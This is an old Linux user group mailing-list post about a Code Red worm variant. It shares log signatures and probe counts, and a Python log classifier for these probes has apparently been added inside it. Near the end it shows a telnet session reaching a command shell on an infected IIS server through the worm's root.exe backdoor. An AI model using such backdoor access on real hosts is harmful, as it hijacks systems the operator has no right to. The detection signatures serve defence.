[Gllug] New Code Red /default.ida?XXXXXXXXXXXX

Rev Simon Rumble simon at rumble.net
Sun Aug 5 22:18:31 UTC 2001


There's a new variant of the Code Red worm around now.  The most
noticeable difference is that the log entries are now:
/default.ida?XXXXXXXXXXXX...

Where previously they were:
/default.ida?NNNNNNNNNNNN...

See this site for more:
http://incidents.org

It appears to be spreading more rapidly.  I've had more probes from
this one already than I have had for the original:

(taz-simon) [08:10:26] /home/rumble/www_logs$ zgrep "default.ida?X" * |wc -l
    172
(taz-simon) [08:11:02] /home/rumble/www_logs$ zgrep "default.ida?N" * |wc -l
    131

I've been told that you can cause a buffer overflow in the virus
itself, causing it to hang, by sending too much data to the virus.
Does anyone know if this is true?  If it is true, simply linking
default.ida to something large, say your kernel source, could disable
it on some machines at least.

This new variant has a nice remotely exploitable backdoor once
installed.  You can get to a shell through the web server, though
talking to it once you get there is beyond me:

telnet xxx.xxx.xxx.xx 80
Trying xxx.xxx.xxx.xx...
Connected to xxx.xxx.xxx.xx.
Escape character is '^]'.
GET /scripts/root.exe HTTP/1.0

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sun, 05 Aug 2001 21:59:25 GMT
Content-Type: application/octet-stream
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

c:\inetpub\scripts>

-- 
Rev Simon Rumble <simon at rumble.net>
www.rumble.net
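As an added example (not part of the post above), here is a small Python classifier that does what the zgrep counts in the post do, but over parsed access-log lines: it separates the N-padded original from the X-padded variant and also flags requests for the /scripts/root.exe backdoor path. It assumes Apache common log format, and the sample lines are constructed, not real traffic.

```python
import re
from collections import Counter

# Apache common log format; only the request path and source IP are used here.
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log lines (assumed format, not taken from the post).
SAMPLE_LOG = """\
10.0.0.1 - - [05/Aug/2001:08:10:26 +0000] "GET /default.ida?NNNNNNNNNNNNNNNN HTTP/1.0" 404 279
10.0.0.2 - - [05/Aug/2001:08:11:02 +0000] "GET /default.ida?XXXXXXXXXXXXXXXX HTTP/1.0" 404 279
10.0.0.3 - - [05/Aug/2001:08:12:00 +0000] "GET /scripts/root.exe HTTP/1.0" 404 277
10.0.0.4 - - [05/Aug/2001:08:12:30 +0000] "GET /index.html HTTP/1.0" 200 1024
10.0.0.2 - - [05/Aug/2001:08:13:00 +0000] "GET /default.ida?XXXXXXXXXXXXXXXX HTTP/1.0" 404 279
"""


def classify(path):
    """Label a request path by the Code Red signature it matches, or None."""
    if path.startswith("/default.ida?N"):
        return "codered-v1"          # original worm: N-padded .ida request
    if path.startswith("/default.ida?X"):
        return "codered-ii"          # new variant: X-padded .ida request
    if path.lower().startswith("/scripts/root.exe"):
        return "root.exe-probe"      # someone looking for the variant's backdoor
    return None


def scan_log(text):
    """Count hits per label and collect the source IPs seen for each.

    A hit means the host was probed by (or scanned for) the worm, not that
    the host itself is infected; the response status shows only whether IIS
    handled the .ida request at all.
    """
    counts = Counter()
    sources = {}
    for line in text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue  # skip lines that are not in common log format
        label = classify(m.group("path"))
        if label:
            counts[label] += 1
            sources.setdefault(label, set()).add(m.group("ip"))
    return counts, sources


if __name__ == "__main__":
    counts, sources = scan_log(SAMPLE_LOG)
    for label, n in counts.items():
        print(f"{label}: {n} hits from {sorted(sources[label])}")
```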

-- 
Gllug mailing list  -  Gllug at linux.co.uk
http://list.ftech.net/mailman/listinfo/gllug
